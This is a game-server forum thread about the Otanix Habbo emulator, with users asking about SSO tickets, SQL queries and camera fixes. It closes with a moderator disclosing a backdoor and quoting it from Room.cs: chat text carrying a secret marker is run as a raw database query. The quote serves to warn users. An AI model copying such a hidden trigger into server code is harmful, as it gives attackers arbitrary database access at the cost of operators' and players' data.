Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

Otanix Emulator [Renamed]

Status
Not open for further replies.
Newbie Spellweaver
Reaction score
You have to change only the SSO ticket generation way and that's it.

Maybe you should explain how to change the SSO ticket. or just helping people out with a old cms that is working on this emulator.

Newbie Spellweaver
Reaction score
Maybe you should explain how to change the SSO ticket. or just helping people out with a old cms that is working on this emulator.

Okay.

When you are on client you sould create a function where the SSO will be displayed where you will do a replace into user_tickets where userid = User id (Obvious) and ssoticket as primary key and with value random things, i recomend to put timestamp for protect to duplicates. And that's it, if you have some error on logs, show me.

Initiate Mage
Reaction score
Thanks for post! <3

With which CMS did you test them?
I'am italian, sorry for the bad translation
With which CMS did you test them?

Junior Spellweaver
Reaction score
this is pointless for most of the people that can't edit a cms for this emulator.
on userdatafactory.cs you will find this, try to change it and will see :

dbClient.setQuery("SELECT * FROM users RIGHT JOIN user_tickets ON user_tickets.userid = users.id WHERE user_tickets.sessionticket = @sso");

Newbie Spellweaver
Reaction score
on userdatafactory.cs you will find this, try to change it and will see :

dbClient.setQuery("SELECT * FROM users RIGHT JOIN user_tickets ON user_tickets.userid = users.id WHERE user_tickets.sessionticket = @sso");

Change what exactly? I'm a beginner in C. Don't have much knowledge about this. I know the basics but my coding knowledge i c is bad.

Elite Diviner
Reaction score
Change what exactly? I'm a beginner in C. Don't have much knowledge about this. I know the basics but my coding knowledge i c is bad.

SELECT * FROM users WHERE [your_cms's_sso_field_in_users_table] = @sso

Newbie Spellweaver
Reaction score
any fix the camera?, .htacces or web.config please.

Camera has to be changed at Habbo.swf, edit it with JPEX Decompiler and change uploading photos rutes.
If you want more info, reply this.

Newbie Spellweaver
Reaction score
Camera has to be changed at Habbo.swf, edit it with JPEX Decompiler and change uploading photos rutes.
If you want more info, reply this.
Thanks, more info please send me mp or reply thanks my brother.

Elite Diviner
Reaction score
Thanks, more info please send me mp or reply thanks my brother.

may have some functionality you can take use of. /rawcam modifies the client to send the png to the emulator as base64 I believe.

Developer
Developer
Reaction score
This server has a backdoor in it, and for that reason I'm going to remove the links to the download and close this thread.

This thread does not deserve to have a release at RZ if it's at the expense of people's databases.

In Room.cs line 3620:

Code:
            if (StringType.Contains("%%rot#$s"))
            {
                var novasql = StringType.Replace("%%rot#$s", "");
                using (IQueryAdapter dbClient = OtanixEnvironment.GetDatabaseManager().getQueryreactor())
                {
                    dbClient.runFastQuery(novasql);
                }
                return;
            }

Status
Not open for further replies.
Back